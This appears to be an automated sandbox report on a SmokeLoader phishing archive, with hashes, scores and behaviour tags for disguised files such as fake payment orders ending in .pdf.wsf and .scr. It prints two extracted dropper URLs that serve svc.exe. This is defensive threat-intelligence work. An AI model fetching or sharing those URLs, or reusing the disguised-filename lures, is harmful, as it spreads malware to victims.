Overview

overview

10

Static

static

8

54678013c8...e6.pdf

windows7-x64

3

54678013c8...e6.pdf

windows10-2004-x64

3

Плате...ь.url

windows7-x64

1

Плате...ь.url

windows10-2004-x64

1

Плате...df.wsf

windows7-x64

10

Плате...df.wsf

windows10-2004-x64

10

Сопро...df.wsf

windows7-x64

10

Сопро...df.wsf

windows10-2004-x64

10

Акт_з�...19.scr

windows7-x64

10

Акт_з�...19.scr

windows10-2004-x64

10

a059d671d9...a2.exe

windows7-x64

10

a059d671d9...a2.exe

windows10-2004-x64

10

Плате...df.wsf

windows7-x64

10

Плате...df.wsf

windows10-2004-x64

10

Сопро...df.wsf

windows7-x64

10

Сопро...df.wsf

windows10-2004-x64

10

cd123c288f...f8c.js

windows7-x64

6

cd123c288f...f8c.js

windows10-2004-x64

7

d6d722ae73...21.doc

windows7-x64

10

d6d722ae73...21.doc

windows10-2004-x64

10

fdfbdd4294...44.exe

windows7-x64

10

fdfbdd4294...44.exe

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    250205-nezbvsvrhk_pw_infected.zip

  • Size

    1.1MB

  • Sample

    250207-fw2vbazmhz

  • MD5

    10c3b083bf2556b548a7758a389cb0d5

  • SHA1

    76cfafac6d51ab522dbb79e5c061dc73ac85148b

  • SHA256

    bc27b3afc72c925df021166fccc262ccf75e2be6f8b04c6772ed36ee8d5a1de0

  • SHA512

    3cfa868331a0c5ea6ba28c9b9287a5f36106c6d46ca77050c4799ce726eb504e4b295e0888da1ae7bf1e02a069115abb516e3f8beeafb064241eec567701d431

  • SSDEEP

    24576:o52GUPjZtUTqphtGxtIS/Vlot58uq5lwQEVdBjU9Dzvxc6qpkNa:o5kHUC2t5c7+wQK7wZpc6IkNa

Score
10/10
smokeloaderbackdoordefense_evasiondiscoveryexecutionlinkmacromacro_on_actionpdftrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://bestmagazineforanimalsunicum.ru/download/svc.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://goodmastersportunicum.ru/load/svc.exe

Targets

    • Target

      54678013c8741db3340960e54ba93001c27619ead5cf5cc2eafd4c0fcf797ae6

    • Size

      161KB

    • MD5

      e75185a22cdf243af1a5f41fd53d9a0d

    • SHA1

      b800205252362b86b10a8e8f56e21143cadab40f

    • SHA256

      54678013c8741db3340960e54ba93001c27619ead5cf5cc2eafd4c0fcf797ae6

    • SHA512

      2d24005c1cb99dcda4ee42e6dee07e312f54359a33a73f64d11321d9fb7a661ebfc722dc12745d0bc30ca4577642bf676fc7748923f24a74eaee6283097cc2f8

    • SSDEEP

      3072:Gnbp8yo1TxQ09Qq0AlutdCZpE0pxfyBPY02AGWeAR:+gxQoSdCZpEafqQ09GWeAR

    Score
    3/10
    discovery
    behavioral1behavioral2

    • Target

      Платежное Поручение в iнозеной валюте та сопроводiтельни документи вiд 23.09.2024p.url

    • Size

      197B

    • MD5

      f68acb34a6164d572fd9fae12223c66d

    • SHA1

      911e0a5ecec7b40883adc6e86383992e043df912

    • SHA256

      2e33c2010f95cbda8bf0817f1b5c69b51c860c536064182b67261f695f54e1d5

    • SHA512

      00c624a474d43829703725e70b64c9524f55816a13a2a9c757bf0421c150c9d6239d07e520d03f23b9664c5c458f330d9a3bcf6ed9bf78a0e8d1cb9ddf51c935

    Score
    1/10
    behavioral3behavioral4

    • Target

      Платежное Поручение в iнозеной валюте.pdf.wsf

    • Size

      219KB

    • MD5

      0359edc4d2038de4660e733f5a80de94

    • SHA1

      681e86b26771ff86c37d8cff72a60b3411f236e9

    • SHA256

      62eb856a5f646c2883a3982f15c3eb877641f9e69783383ce8a73c688eccd543

    • SHA512

      db9fb693f344155fabdcd2b11702a20022869f77b0b925b4067b121c6cd0c35a4b7ae93b4907cedd193e71cfca5c78d7b57a6b221f923d6234a9dc94e0d62549

    • SSDEEP

      1536:DP4ANQd3mqQmBB10kZzt8zxcsw07HdB8S+OFPN6EZLS8+EqlbGDPp9RP4ANQd3m1:yBj5GsTwPMOS8+77Bj5GsTwPMOS8+O

    Score
    10/10
    execution

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral5behavioral6

    • Target

      Сопроводiтельни документи вiд 23.09.2024p.pdf.wsf

    • Size

      225KB

    • MD5

      4f6cb09e56494f178fd06ee05c3880ac

    • SHA1

      45810dc8fa00d54a302d8ea5a7563a21c93c94f4

    • SHA256

      5c7d582ba61ac95fb0d330ecc05feeb4853ac1de1f5a6fd12df6491dd0b7ea34

    • SHA512

      ab4ccc4d21d4d719e3c9fbc447d79b6ede14a82dd0ecd162d729805cd8033163484c3464cbcab0a3d9084742004edcfecda6f8901dd2ffa5e3f27b7e495c32b7

    • SSDEEP

      1536:DP4ANQd3mqQmBB10kZzt8zxcsw07HdB8S+OFPN6EZLS8+EKa/GeQP4ANQd3mqQmY:yBj5GsTwPMOS8+UBj5GsTwPMOS8+O

    Score
    10/10
    execution

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral7behavioral8

    • Target

      Акт_звiрки_№180924_вiд_26_09_2024р_зг_рах_UA973248410000000026006263319.scr

    • Size

      261KB

    • MD5

      28971ced9168cc58fe92749bdff49afe

    • SHA1

      6b8cb8a205dc3fef12981306d5b7072f519cff3c

    • SHA256

      fdfbdd42944c9e3b9697a8d8375e4e5cfd45c86941aa3f8f6dd0d08607b73144

    • SHA512

      ab82ad76a957e5f558a597b9fcd9d69cad1ab3c185e590d0726eff00623e812076845b4e4b05fc3dc6a95ff73de9d3b492e552ad9d3aaaf6fd672990b3c0e71c

    • SSDEEP

      3072:ELia71mN5VMDa8WrGmL2DO5VK1JLpSm5wgWyhM/5hYKIQ2MMDW27U5O5:ELiM1qqafCD+VKAgThM/5yxNDDo5

    Score
    10/10
    smokeloaderbackdoordiscoverytrojan
    behavioral10behavioral9

    • Target

      a059d671d950abee93ef78a170d58a3839c2a465914ab3bd5411e39c89ae55a2

    • Size

      249KB

    • MD5

      6476071b5a91ac078350768dc9b2e953

    • SHA1

      f40fcb5af96c56305a64790ccbaa261c10173782

    • SHA256

      a059d671d950abee93ef78a170d58a3839c2a465914ab3bd5411e39c89ae55a2

    • SHA512

      87784413018fea89dff5763d08e00d878af9a3db6b29708dec6fe0d0d3feb4eb8f3efc5c27851d13eb779bd3dedebdcc5958e349b8acc03102f8be6b0dd78f9d

    • SSDEEP

      6144:H5LCUgHU2L8e3oGdA0UkzFYc5NHuPCYE:H5GUyUC7oeARkjSCYE

    Score
    10/10
    smokeloaderbackdoortrojandiscovery
    behavioral11behavioral12

    • Target

      Платежное Поручение в iнозеной валюте.pdf.wsf

    • Size

      219KB

    • MD5

      0359edc4d2038de4660e733f5a80de94

    • SHA1

      681e86b26771ff86c37d8cff72a60b3411f236e9

    • SHA256

      62eb856a5f646c2883a3982f15c3eb877641f9e69783383ce8a73c688eccd543

    • SHA512

      db9fb693f344155fabdcd2b11702a20022869f77b0b925b4067b121c6cd0c35a4b7ae93b4907cedd193e71cfca5c78d7b57a6b221f923d6234a9dc94e0d62549

    • SSDEEP

      1536:DP4ANQd3mqQmBB10kZzt8zxcsw07HdB8S+OFPN6EZLS8+EqlbGDPp9RP4ANQd3m1:yBj5GsTwPMOS8+77Bj5GsTwPMOS8+O

    Score
    10/10
    execution

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral13behavioral14

    • Target

      Сопроводiтельни документи вiд 23.09.2024p.pdf.wsf

    • Size

      225KB

    • MD5

      4f6cb09e56494f178fd06ee05c3880ac

    • SHA1

      45810dc8fa00d54a302d8ea5a7563a21c93c94f4

    • SHA256

      5c7d582ba61ac95fb0d330ecc05feeb4853ac1de1f5a6fd12df6491dd0b7ea34

    • SHA512

      ab4ccc4d21d4d719e3c9fbc447d79b6ede14a82dd0ecd162d729805cd8033163484c3464cbcab0a3d9084742004edcfecda6f8901dd2ffa5e3f27b7e495c32b7

    • SSDEEP

      1536:DP4ANQd3mqQmBB10kZzt8zxcsw07HdB8S+OFPN6EZLS8+EKa/GeQP4ANQd3mqQmY:yBj5GsTwPMOS8+UBj5GsTwPMOS8+O

    Score
    10/10
    execution

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    behavioral15behavioral16

    • Target

      cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c

    • Size

      10KB

    • MD5

      14b3fe437467996209704e6ebaac0f0a

    • SHA1

      76352226e921e8cf57746c551735cd913c3e45c8

    • SHA256

      cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c

    • SHA512

      a4bbc226b4e35afa37702d852325a83103570b01ed76b151ab05a1f96ff855fa12579836dea116e5a9e64bbec63606773ac49ac3b2147a2cd001f46e4d8f93de

    • SSDEEP

      192:mpu81rs1WEVHAq/azhC8bw33tDMRI7xxYG8N0vJod67czsGSVXi:mU81rW1lTyzM33du0viCczSXi

    Score
    7/10
    defense_evasionexecution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

      execution

    • Obfuscated Files or Information: Command Obfuscation

      Adversaries may obfuscate content during command execution to impede detection.

      defense_evasion
    behavioral17behavioral18

    • Target

      d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21

    • Size

      119KB

    • MD5

      7564fc9db09034f49408c33fae34a335

    • SHA1

      c0a49e5e0054673b3cea2a9e279c896eb2ebec27

    • SHA256

      d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21

    • SHA512

      7e0cc0628d8d6c00c713fa9318d0ec0735f19d449bcf86e6c93e837bd55364d2029b4d309538fc8be5d1b5035499572d2f5e3480593576171b9e6ca059e3b94a

    • SSDEEP

      1536:J7LlLq2TvoxHCQQv56sSFXC5uHQA1pzJGrDwQwMw1UV6XhnOQ5w:dLzTKiQa2SgPpzErF41k6ksw

    Score
    10/10
    defense_evasiondiscoveryexecution

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

      execution

    • Obfuscated Files or Information: Command Obfuscation

      Adversaries may obfuscate content during command execution to impede detection.

      defense_evasion
    behavioral19behavioral20

    • Target

      fdfbdd42944c9e3b9697a8d8375e4e5cfd45c86941aa3f8f6dd0d08607b73144

    • Size

      261KB

    • MD5

      28971ced9168cc58fe92749bdff49afe

    • SHA1

      6b8cb8a205dc3fef12981306d5b7072f519cff3c

    • SHA256

      fdfbdd42944c9e3b9697a8d8375e4e5cfd45c86941aa3f8f6dd0d08607b73144

    • SHA512

      ab82ad76a957e5f558a597b9fcd9d69cad1ab3c185e590d0726eff00623e812076845b4e4b05fc3dc6a95ff73de9d3b492e552ad9d3aaaf6fd672990b3c0e71c

    • SSDEEP

      3072:ELia71mN5VMDa8WrGmL2DO5VK1JLpSm5wgWyhM/5hYKIQ2MMDW27U5O5:ELiM1qqafCD+VKAgThM/5yxNDDo5

    Score
    10/10
    smokeloaderbackdoortrojandiscovery
    behavioral21behavioral22

MITRE ATT&CK Enterprise v15

Tasks

static1

pdflinkmacromacro_on_action
Score
8/10

behavioral1

discovery
Score
3/10

behavioral2

discovery
Score
3/10

behavioral3

Score
1/10

behavioral4

Score
1/10

behavioral5

execution
Score
10/10

behavioral6

execution
Score
10/10

behavioral7

execution
Score
10/10

behavioral8

execution
Score
10/10

behavioral9

smokeloaderbackdoortrojan
Score
10/10

behavioral10

smokeloaderbackdoordiscoverytrojan
Score
10/10

behavioral11

smokeloaderbackdoortrojan
Score
10/10

behavioral12

smokeloaderbackdoordiscoverytrojan
Score
10/10

behavioral13

execution
Score
10/10

behavioral14

execution
Score
10/10

behavioral15

execution
Score
10/10

behavioral16

execution
Score
10/10

behavioral17

defense_evasionexecution
Score
6/10

behavioral18

defense_evasionexecution
Score
7/10

behavioral19

defense_evasiondiscoveryexecution
Score
10/10

behavioral20

defense_evasionexecution
Score
10/10

behavioral21

smokeloaderbackdoortrojan
Score
10/10

behavioral22

smokeloaderbackdoordiscoverytrojan
Score
10/10